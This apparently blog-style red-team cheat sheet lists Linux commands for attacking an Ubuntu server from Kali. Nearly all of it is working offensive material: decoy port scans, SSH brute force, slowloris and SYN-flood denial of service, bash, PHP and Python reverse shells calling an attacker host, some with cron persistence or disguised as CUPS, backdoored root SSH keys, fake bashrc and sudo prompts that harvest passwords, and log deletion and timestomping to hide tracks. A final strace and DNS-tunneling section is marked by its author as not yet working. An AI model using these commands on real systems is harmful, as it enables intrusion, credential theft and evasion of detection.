Red Team Tricks with Linux

I have collected some Linux commands and tricks that Red Team can use for their evil deeds. All these commands and tricks have been tested against Ubuntu 16.04 server and attackers computer is Kali Linux 2019.3.

Legal disclaimer

The methods are presented for educational purposes only.
You are responsible for not using the techniques for illegal purposes.

Label meanings

[victim ip address] means add your target IP address example 127.0.0.1
[victim ip address zone] means add your target IP address zone example 10.1.1.0/24
[decoy ip address] means add a decoy address that you want to frame to be the attacker example 127.0.0.2
[domain] means add a victim domain example localhost
[username] means add a username example admin
[attacker domain] means add a hostile computer’s ip address example 127.0.0.3
[target folder/file] means add a target folder or file that you want to change example /home/username/newfile
[source folder/file] means add a source folder or file that you want to use as reference example /bin

Scanning and denying

Nmap

Nmap is a network scanning tool.

Scan 1000 most common ports. Delay is about 1 second.

# nmap --top-ports 1000 -T2 [victim ip address]

Scan all ports aggressively

# nmap -p- -T4 [victim ip address]

Try to determine Operation system. Scan 1000 most common ports and try to determine service and version.

# nmap -O -sV --top-ports 1000 -T4 [victim ip address]

Scan insane fast in parallel and use decoys. In a target computer it looks like 3 different IP addresses are trying to scan it ports.

# nmap -p- -T5 --min-parallelism 5 [victim ip address zone] -D[decoy ip address],[decoy ip address]

Hydra

Hydra is a brute force tool.

Brute forcing SSH account. Try to brute force 4 length password that contains only letters a and o. Delay is 1 second. Brute forcing is stopped if correct username and password is found.

# hydra -f -t 1 -l [username] -V -x 4:4:ao [victim ip address] ssh

Slowhttptest

Slowlori attack is opening connections to HTTP server and keeps connections open. This makes web server to be very slow or unreachable.

Open 1000 connection and send only unfinished HTTP requests. Open 200 new connections per second and keep connections open by sending GET method in every 10 second with maximum length of 24 and wait 3 seconds for response.

# slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u http://[victim ip address or domain] -x 24 -p 3

DOS

Take lot of TCP connections to target

# nping --tcp-connect --rate=1000000 --count 1000000 [victim ip address or domain]

Send much as possible TCP connections to target to port 21 and change source address to a decoy IP address. Flood by sending 10000 packets using SYN flag and data size is 120.

$ sudo hping3 -V -c 10000 -d 120 -S -p 21 --flood [victim ip address] -a [decoy ip address]

Reverse shells

Bash reverse shell

In attacker’s computer listen 51920 port using Netcat

# nc -l -p 51920

Victim is connecting to attacker and opening reverse shell

# /bin/bash -i >& /dev/tcp/[attacker ip address]/51920 0>&1

You can also create a script that will try to open a reverse shell in every 5 minute

# nano /etc/cron.d/update_check
*/5 * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/[attacker ip address]/51920 0>&1'

Reverse shell using PHP site

Install Apache and PHP to victim’s computer and create PHP file that will open a reverse shell when the page is requested by HTTP protocol.

# apt install apache2 php libapache2-mod-php
# adduser www-data sudo
# passwd www-data

# nano /var/www/html/example.php
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/" . $_GET["x"] . "/" . $_GET["y"] . " 0>&1'"); ?>

# touch /var/www/html/example.php -r /var/www/html/index.html
# service apache2 restart

In attacker’s computer listen 51920 port using Netcat and send HTTP request to malicious site. With HTTP request the victim’s computer will open the reverse shell

# nc -l -p 51920
# curl 'http://[victim ip address]/example.php?x=[attacker domain]&y=51920'

This is how you can give password using only one line example in reverse shell

$ echo 'password' | sudo -S command

Python site reverse shell and fake it to look like CUPS

Give a sudo rights to user nobody without need to give a password

# nano /etc/sudoers.d/nobody
nobody ALL=(ALL) NOPASSWD:ALL

Fake Python to look like CUPS, create a Python script and start a Python server

# python -V
Python 2.7.12

# cp /usr/bin/python /usr/bin/cups
# mkdir -p /var/www/cgi-bin
# nano /var/www/cgi-bin/index.py

#! /usr/bin/cups  
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("[attacker domain]",51920));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);

# chmod a+x /var/www/cgi-bin/index.py
# cd /var/www/
# /usr/bin/cups -m CGIHTTPServer 631

If you would NMAP victim’s computer with default options it would look like ipp(CUPS) service is running

# nmap -p 631 [victim ip address]
PORT    STATE SERVICE
631/tcp open  ipp

In attacker’s computer listen 51920 port using Netcat and send HTTP request to malicious site

# nc -l -p 51920
# curl 'http://[victim ip address]:631/cgi-bin/index.py'

SSH tricks and stealing passwords

SSH listening different port using reverse shell

Add PORT 2222 end of the /etc/ssh/sshd_config

# echo PORT 2222 >> /etc/ssh/sshd_config

Restart SSH daemon

# service ssh restart

Now you can take SSH to port 2222

# ssh [username]@[victim ip address] -p 2222

SSH Public Key Authentication

Create key pair on hostile’s computer, move public key to victim’s computer and take SSH connection to it

# ssh-keygen
# ssh-copy-id [username]@[victim ip address]
# ssh [username]@[victim ip address]

On victim’s computer modify sshd_config allow the root to login, change SSH to find public keys also from /etc/ssh/authorized_keys and move public key to that location.

# nano /etc/ssh/sshd_config
PermitRootLogin yes
AuthorizedKeysFile %h/.ssh/authorized_keys /etc/ssh/authorized_keys

# cp /home/[username]/.ssh/authorized_keys /etc/ssh/
# chown root:root /etc/ssh/authorized_keys
# chmod +r /etc/ssh/authorized_keys
# service ssh restart
# touch /etc/ssh/sshd_config -r /srv
# touch /etc/ssh/authorized_keys -r /srv

Now you can take SSH connection without password using root (or any other user) from hostile computer

# ssh [email protected][victim ip address]

Steal SSH password using bashrc

Modify bash.bashrc so it looks like first password went wrong and you need to write it again, but actually it steals victim’s password and adds it to a file

# nano /etc/bash.bashrc

Add these line to end of the bash.bashrc file

clear
echo "$(whoami)@$(hostname -I)'s password:"
echo "Permission denied, please try again."
read -s -p "$(whoami)@$(hostname -I)'s password: "  password
echo "$password" >> /tmp/password.txt
echo   

Sudo alias and steal sudo password

This needs permanent solution to add alias and better way to do cut
Create file that asks sudo password, runs the last command and steals the password and adds it to a file

# nano /bin/admin
read -s -p "[sudo] password for $(whoami): "  password
echo
echo $password >> /tmp/sudo_password.txt
echo $password | /usr/bin/sudo -S $(history 1 | cut -c 13-)  

Give execute permissions to that file and give the script to sudo alias

# chmod +rx /bin/admin
# alias sudo="/bin/admin"

Now every time victim is running sudo [command] script asks password, steals the password and runs the command what victim wanted to run.

After this we can hide this alias modification by modifying the alias command

# alias > /bin/alias_old
# alias alias="cat /bin/alias_old"

Cleaning your evil deeds

Erasing history

Remove old history

# rm -r ~/.bash_history

Clean session history and exit

# history -c && exit

Link history to /dev/null so history does not save anything

# ln -sf /dev/null ~/.bash_history

Clean logs

Delete all useful log files

# rm -r /var/log/apache2
# rm -r /var/log/apt
# rm /var/log/mail*
# rm /var/log/dpkg.log
# rm /var/log/syslog*
# rm /var/log/auth*

Folder and File time modifications

Check a folder or a file creation and modification time

# stat [target folder/file]

Change a folder or a file creation and modification time to YYYYMMDDhhmm

# touch -t 201212211111 [target folder/file]

Change a folder or a file modification time to YYYYMMDDhhmm

# touch -mt 201212211111 [target folder/file]

Copy creation and modification time from other file or folder

# touch [target folder/file] -r [source folder/file]

List all files that has been changed in 7 days

# find [target folder] -iname "*" -atime -7 -type f

List all folders that has been changed in 7 days

# find [target folder] -iname "*" -atime -7 -type d

Change creation and modification time for all files that has been modified in 7 days

# touch -t 201212211111 $(find [target folder] -iname "*" -atime -7 -type f)

Change creation and modification time for all folders that has been modified in 7 days

# touch -t 201212211111 $(find [target folder] -iname "*" -atime -7 -type d)

Copy creation and modification time for all files that has been modified in 7 days. Source folder could be something like /bin

# touch $(find [target folder] -iname "*" -atime -7 -type f) -r [source folder/file]

*******************************

UNDER THIS DOES NOT WORK YEAT

*******************************

Get SSH credentials using strace

$ sudo strace -f -p $(pgrep -o sshd) -o sniff.txt -e trace=write
$ sudo /usr/bin/strace -f -p $(pgrep -o sshd) -e trace=write 2>&1 | grep '\\0\\0\\0\\4\|\\0\\0\\0\\10'
$ /usr/bin/strace -f -p $(pgrep -o sshd) -e trace=write 2>&1 | grep --line-buffered '\\0\\0\\0\\5\|\\0\\0\\0\\10' >> tiedosto.txt
$ /usr/bin/strace -f -p $(pgrep -o sshd) -e trace=write 2>&1 | grep --line-buffered -e "$(/bin/hostname)" -e '\\0\\0\\0\\10' >> tiedosto.txt
$ (/usr/bin/strace -f -p $(pgrep -o sshd) -e trace=write 2>&1 | grep --line-buffered -e "$(/bin/hostname)" -e '\\0\\0\\0\\10' >> /var/gnome.1) &

strace with reverse shell

$ sed -i -e 's/KillMode=process/KillMode=process\nExecStartPost=\/etc\/systemd\/system\/sshd.sh/g' /lib/systemd/system/ssh.service
$ printf '#!/bin/bash\n/usr/bin/strace -f -p $MAINPID -e trace=write 2>&1 | grep --line-buffered -e "$(/bin/hostname)" -e ' > /etc/systemd/system/sshd.sh
$ echo "'\\\\0\\\\0\\\\0\\\\10' >> /var/gnome.1 &" >> /etc/systemd/system/sshd.sh

$ chmod +x /etc/systemd/system/sshd.sh
$ systemctl daemon-reload
$ service ssh restart

strace with ssh

$ sudoedit /lib/systemd/system/ssh.service
ExecStartPost=/etc/systemd/system/sshd.sh

$ sudoedit /etc/systemd/system/sshd.sh
#!/bin/bash
(/usr/bin/strace -f -p $MAINPID -e trace=write 2>&1 | grep --line-buffered -e "$(/bin/hostname)" -e '\\0\\0\\0\\10' >> /var/gnome.1) &

$ chmod +x /etc/systemd/system/sshd.sh
$ systemctl daemon-reload
$ service ssh restart

grepping the password and username

$ cat sniff.txt | cut -d ' ' -f 4 | sort | uniq -c | sort -nr
$ grep '\\0\\0\\0\\10' sniff.txt
käyttäjä
$ grep '\\0\\0\\0\\4' sniff.txt
$ grep '@computer' sniff.txt

DNS tunneling

$ apt-get install iodine

Server to listen

# iodined -f -P 12345 [target ip address] [hostile domain]

Client

$ sudo iodine -f -P 12345 -r [hostile domain]

SPAM mail

Windows create traffic using curl

set list=http://localhost1 http://localhost2
set list2=http://localhost3 http://localhost3

:loop
set /A test=%RANDOM% * 20 / 32768 + 1 + 20

ipconfig /flushdns

(for %%a in (%list%) do (
REM Chrome
	curl.exe -kLI "%%a"  -H "cache-control: max-age=0" -H "upgrade-insecure-requests: 1" -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36" -H "sec-fetch-mode: navigate" -H "sec-fetch-user: ?1" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" -H "sec-fetch-site: none" -H "accept-encoding: gzip, deflate, br" -H "accept-language: en-US,en;q=0.9,fi;q=0.8"
	timeout %test%
))

(for %%a in (%list2%) do (
REM Firefox
	curl.exe -kLI "%%a"  -H "cache-control: max-age=0" -H "upgrade-insecure-requests: 1" -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763" -H "sec-fetch-mode: navigate" -H "sec-fetch-user: ?1" -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" -H "sec-fetch-site: none" -H "accept-encoding: gzip, deflate, br" -H "accept-language: en-US,en;q=0.9,fi;q=0.8"
	timeout %test%
))

goto loop

https://linux.die.net/man/1/knockd
AXFR query using tcp connection to port 53